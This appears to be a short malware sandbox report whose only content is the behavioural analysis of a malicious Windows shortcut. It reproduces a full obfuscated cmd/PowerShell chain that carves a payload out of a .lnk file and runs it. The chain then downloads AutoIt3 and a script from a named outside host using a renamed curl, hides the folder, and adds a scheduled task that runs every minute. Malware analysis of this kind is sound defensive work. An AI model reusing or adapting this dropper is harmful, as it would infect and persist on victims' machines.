Behavioral Analysis

cmd.exe "C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$thumb=0;<#cVv vltb#>$sow=Get-ChildItem *.lnk;<#ScC AvLl#>$sow=$sow|<#NKU IALT#>where-object{$_.length -eq 0x0020890F};<#hpb BpOs#>$turtle=$sow;<#qca UHRj#>$sow=$sow|<#SKU AbBK#>Select-Object -ExpandProperty Name;<#PZI XrSY#>if($sow.length -eq 0){$thumb=1;<#bEY oNnP#>$sow=Get-ChildItem -Path $env:TEMP -Recurse -Filter *.lnk|<#xqH IlRX#>where-object{$_.length -eq 0x0020890F}|<#nVQ eWoJ#>ForEach-Object{$_.FullName}|<#fgr eAiU#>Select-Object -First 1;<#HaC KElI#>$turtle=$sow};<#wpd TXDw#>$exercise=$sow.substring(0,$sow.length-4);<#ziV bVoR#>$language=[System.IO.BinaryReader]::new([System.IO.File]::open($sow,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read));<#dHW HTfJ#>try{$language.BaseStream.Seek(0x0000150F,[System.IO.SeekOrigin]::Begin);<#xEb eKFP#>$scream=$language.ReadBytes(0x00187400);<#CcE BEGf#>}finally{$language.Close()};<#yhE EqBv#>for($teenager=0;<#ulr Nfbg#>$teenager -lt $scream.count;<#gJE TxsN#>$teenager++){$scream[$teenager]=$scream[$teenager] -bxor 0x00};<#cCp CqOc#>[System.IO.File]::WriteAllBytes($exercise,$scream);<#wcK UzON#>if($thumb -eq 1){$ruin=$exercise}else{$ruin='.\'+$exercise};<#QBj mbNt#>& $ruin;<#rNu Eqav#>remove-item -path $turtle -force;<#FXh smYo#>"&mkdir c:\VezoQcO & attrib +h c:\VezoQcO & cd /d c:\VezoQcO & copy c:\windows\system32\curl.exe VezoQcO.exe & VezoQcO -k -o AutoIt3.exe https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super^&za=mongo0 & VezoQcO -k -o xNQbMGm.au3 https://cavasa.com.co/webpyp/wp-includes/images/crystal/hurryup/?rv=super^&za=mongo1 & s^ch^ta^sks /delete /tn "xNQbMGm" /f & s^ch^ta^sks /create /sc minute /mo 1 /tn "xNQbMGm" /tr "c:\VezoQcO\AutoIt3.exe c:\VezoQcO\xNQbMGm.au3"